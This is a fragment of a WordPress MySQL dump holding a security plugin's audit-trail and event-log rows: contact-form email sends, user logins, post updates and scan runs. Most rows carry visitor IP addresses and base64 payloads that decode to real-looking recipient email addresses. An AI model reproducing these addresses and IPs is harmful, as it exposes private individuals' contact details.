JidF9saW5lIjo0MTZ9',0,1573001370,0),(864,'5a917ffbe6','202.188.22.154','-','emails','email_attempt_send',1,'','eyJ0byI6Indpbm5pZUBzY2llbnRleC5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCAgVXMiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1573629792,0),(807,'20052a9a36','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwb3J0Zm9saW8ifQ==',0,1572926364,0),(844,'32d9702cc1','103.14.184.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573198593,0),(858,'d697958943','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6Im5hamlia2hhbGlkQHZvc3Rlcm1hbnMuY29tIiwic3ViamVjdCI6IkNvbnRhY3QgIFVzIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1573618805,0),(859,'e32682aca3','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573618808,0),(863,'5a917ffbe6','202.188.22.154','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573629792,0),(839,'c5ac890886','42.153.150.237','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhemxpbkBuYWhyaW0uZ292Lm15Iiwic3ViamVjdCI6IkNvbnRhY3QgIFVzIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1573088437,0),(840,'c0cfd35c28','110.159.139.55','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573101465,0),(841,'c0cfd35c28','110.159.139.55','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573101465,0),(849,'040e883472','103.6.198.69','WP Cron','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiV1BGb3JtcyBTdW1tYXJ5IiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC93cGZvcm1zLWxpdGVcL3NyY1wvRW1haWxzXC9NYWlsZXIucGhwIiwiYnRfbGluZSI6NTA4fQ==',0,1573452148,0),(845,'32d9702cc1','103.14.184.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImpvZWhhcnlAd2hzc2IuY29tLm15Iiwic3ViamVjdCI6IkdldCBRdW90YXRpb24gKExvZ2l0ZWNoKSIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1573198593,0),(847,'acc6ac78d9','115.132.104.9','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573429315,0),(861,'e32682aca3','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6Im5hamlia2hhbGlkQHZvc3Rlcm1hbnMuY29tIiwic3ViamVjdCI6IkNvbnRhY3QgIFVzIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1573618808,0),(862,'5a917ffbe6','202.188.22.154','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573629792,0),(869,'42fe212652','60.50.64.32','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573695007,0),(860,'e32682aca3','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573618808,0),(842,'c0cfd35c28','110.159.139.55','-','emails','email_attempt_send',1,'','eyJ0byI6Im5hdGhhbmllbC5jZWVjQGdtYWlsLmNvbSIsInN1YmplY3QiOiJDb250YWN0ICBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1573101465,0),(792,'08243199b8','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572914328,0),(797,'9015c865fc','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572919693,0),(815,'57b6141e02','45.126.255.67','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1572954582,0),(821,'1e9c88b3ff','115.132.145.182','-','users','user_login',1,'','eyJ1c2VyIjoicGVudGFkYmlyd2ViIn0=',0,1573006524,0),(803,'fe21270703','203.116.87.162','-','emails','email_attempt_send',1,'','eyJ0byI6ImZjbGVlQGRlbnNvLmNvbS5teSIsInN1YmplY3QiOiJHZXQgUXVvdGF0aW9uIChMb2dpdGVjaCkiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1572925831,0),(852,'8274be5ec7','110.159.135.171','-','emails','email_attempt_send',1,'','eyJ0byI6ImhlbGxvQGRhdGFrcmFmLmNvbSIsInN1YmplY3QiOiJHZXQgUXVvdGF0aW9uIChMb2dpdGVjaCkiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1573555969,0),(843,'32d9702cc1','103.14.184.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573198593,0),(848,'acc6ac78d9','115.132.104.9','-','emails','email_attempt_send',1,'','eyJ0byI6Im1hbm9qLm5haXJAZ2xvYmFsaW5kaWFuc2Nob29sLm9yZyIsInN1YmplY3QiOiJHZXQgUXVvdGF0aW9uIChMb2dpdGVjaCkiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1573429315,0),(846,'acc6ac78d9','115.132.104.9','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573429315,0),(810,'69b621e09a','175.138.214.59','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoUEFOQVNPTklDIFRPVUdIQk9PSykiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDE2fQ==',0,1572931513,0),(798,'ab3d517823','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572924587,0),(802,'fe21270703','203.116.87.162','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572925831,0),(818,'e9517dd430','175.144.36.207','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573001370,0),(811,'69b621e09a','175.138.214.59','-','emails','email_attempt_send',1,'','eyJ0byI6ImFkbWluQG5iY3NiLmNvbS5teSIsInN1YmplY3QiOiJHZXQgUXVvdGF0aW9uIChQQU5BU09OSUMgVE9VR0hCT09LKSIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1572931513,0),(865,'4b4828a987','60.48.96.103','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573689381,0),(785,'7b0c70e531','175.139.143.105','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572837861,0),(856,'d697958943','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573618805,0),(867,'4b4828a987','60.48.96.103','-','emails','email_attempt_send',1,'','eyJ0byI6InNobjkxMTNAZ21haWwuY29tIiwic3ViamVjdCI6IkNvbnRhY3QgIFVzIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1573689381,0),(791,'01bb44ea70','175.142.115.248','-','users','user_login',1,'','eyJ1c2VyIjoicGVudGFkYmlyd2ViIn0=',0,1572914137,0),(793,'08243199b8','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572914328,0),(790,'5afdd847ac','103.6.198.69','WP Cron','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiV1BGb3JtcyBTdW1tYXJ5IiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC93cGZvcm1zLWxpdGVcL3NyY1wvRW1haWxzXC9NYWlsZXIucGhwIiwiYnRfbGluZSI6NTA4fQ==',0,1572847279,0),(851,'8274be5ec7','110.159.135.171','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573555969,0),(850,'8274be5ec7','110.159.135.171','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573555969,0),(794,'08243199b8','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572914328,0),(788,'72f71d0194','202.168.66.190','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1572839927,0),(813,'cfcfb1e30d','121.122.86.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572941820,0),(783,'32620eca20','103.6.198.69','WP Cron','posts','post_deleted',1,'','eyJ0aXRsZSI6IkFyY2FkaWEifQ==',0,1572569453,0),(782,'32620eca20','103.6.198.69','WP Cron','posts','post_deleted',1,'','eyJ0aXRsZSI6IiJ9',0,1572569453,0),(857,'d697958943','60.54.41.3','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573618805,0),(866,'4b4828a987','60.48.96.103','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573689381,0),(784,'7b0c70e531','175.139.143.105','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572837861,0),(812,'cfcfb1e30d','121.122.86.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572941820,0),(804,'bcc723d4eb','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IkdldCBRdW90YXRpb24gKFRhcmd1cykiLCJ0eXBlIjoicGFnZSJ9',0,1572925860,0),(805,'9afa24020a','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IkdldCBRdW90YXRpb24gKFRhcmd1cykiLCJ0eXBlIjoicGFnZSJ9',0,1572926132,0),(806,'c1a0d75d92','175.142.115.248','pentadbirweb','posts','post_published',1,'','eyJ0aXRsZSI6IkdldCBRdW90YXRpb24gKFRhcmd1cykiLCJ0eXBlIjoicGFnZSJ9',0,1572926137,0),(826,'1334f50a47','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020135,0),(825,'1334f50a47','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020135,0),(834,'ff5c7c05ec','120.50.55.254','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573026968,0),(835,'ff5c7c05ec','120.50.55.254','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1573026968,0),(836,'ff5c7c05ec','120.50.55.254','-','emails','email_attempt_send',1,'','eyJ0byI6ImV6dWRkaW5AdHJhbnNmb2N1cy5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1573026968,0),(870,'42fe212652','60.50.64.32','-','emails','email_attempt_send',1,'','eyJ0byI6InNhbGVzQHdpc3Ryb25pYy5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCAgVXMiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1573695007,0);
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_audit_trail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_events`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_events` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `event` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'none' COMMENT 'Event ID',
  `count` int(11) unsigned NOT NULL DEFAULT '0' COMMENT 'Total',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=975 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_events`
--

LOCK TABLES `wpdp_icwp_wpsf_events` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_events` DISABLE KEYS */;
INSERT INTO `wpdp_icwp_wpsf_events` (`id`, `event`, `count`, `created_at`, `deleted_at`) VALUES (1,'session_start',1,1569079582,0),(2,'email_attempt_send',1,1569079592,0),(3,'email_attempt_send',1,1569079613,0),(4,'email_attempt_send',1,1569079622,0),(5,'email_attempt_send',1,1569079648,0),(6,'test_cron_run',1,1569079650,0),(7,'email_attempt_send',1,1569079677,0),(8,'email_attempt_send',1,1569079698,0),(9,'email_attempt_send',1,1569079702,0),(10,'ufc_scan_run',1,1569079756,0),(11,'apc_scan_run',1,1569079756,0),(12,'wcf_scan_run',1,1569079756,0),(13,'email_attempt_send',1,1569079781,0),(14,'email_attempt_send',1,1569079805,0),(15,'email_attempt_send',1,1569079807,0),(16,'email_attempt_send',1,1569079883,0),(17,'email_attempt_send',1,1569079886,0),(18,'email_attempt_send',1,1569079897,0),(19,'email_attempt_send',1,1569079933,0),(20,'email_attempt_send',1,1569079959,0),(21,'email_attempt_send',1,1569080005,0),(22,'email_attempt_send',1,1569080056,0),(23,'email_attempt_send',1,1569080116,0),(24,'email_attempt_send',1,1569080140,0),(25,'email_attempt_send',1,1569080162,0),(26,'email_attempt_send',1,1569080212,0),(27,'email_attempt_send',1,1569080230,0),(28,'email_attempt_send',1,1569080264,0),(29,'email_attempt_send',1,1569080298,0),(30,'email_attempt_send',1,1569080321,0),(31,'email_attempt_send',1,1569080339,0),(32,'email_attempt_send',1,1569080442,0),(33,'email_attempt_send',1,1569080471,0),(34,'email_attempt_send',1,1569080492,0),(35,'plugin_activated',1,1569080495,0),(36,'email_attempt_send',1,1569080501,0),(37,'plugin_activated',1,1569080520,0),(38,'email_attempt_send',1,1569080524,0),(39,'plugin_activated',1,1569080525,0),(40,'plugin_activated',1,1569080556,0),(41,'email_attempt_send',1,1569081422,0),(42,'session_terminate',1,1569081757,0),(43,'session_start',1,1569081757,0),(44,'email_attempt_send',1,1569081757,0),(45,'user_login',1,1569081757,0),(46,'email_attempt_send',1,1569081828,0),(47,'email_attempt_send',1,1569083663,0),(48,'email_attempt_send',1,1569083882,0),(49,'email_attempt_send',1,1569090080,0),(50,'email_attempt_send',1,1569098644,0),(51,'email_attempt_send',1,1569112319,0),(52,'email_attempt_send',1,1569119123,0),(53,'email_attempt_send',1,1569124195,0),(54,'email_attempt_send',1,1569134927,0),(55,'email_attempt_send',1,1569137890,0),(56,'email_attempt_send',1,1569142042,0),(57,'test_cron_run',1,1569166452,0),(58,'wcf_scan_run',1,1569166579,0),(59,'apc_scan_run',1,1569166579,0),(60,'ufc_scan_run',1,1569166579,0),(61,'session_notfound',1,1569199987,0),(62,'session_start',1,1569201363,0),(63,'email_attempt_send',1,1569201363,0),(64,'user_login',1,1569201363,0),(65,'session_start',1,1569203532,0),(66,'user_login',1,1569203532,0),(67,'post_updated',1,1569203999,0),(68,'post_updated',1,1569204751,0),(69,'post_updated',1,1569205266,0),(70,'post_updated',1,1569205292,0),(71,'post_updated',1,1569205341,0),(72,'post_updated',1,1569205637,0),(73,'post_updated',1,1569205683,0),(74,'post_updated',1,1569205898,0),(75,'post_updated',1,1569210554,0),(76,'post_updated',1,1569212426,0),(77,'post_updated',1,1569212499,0),(78,'post_updated',1,1569212533,0),(79,'post_updated',1,1569212893,0),(80,'post_updated',1,1569213534,0),(81,'post_updated',1,1569214376,0),(82,'p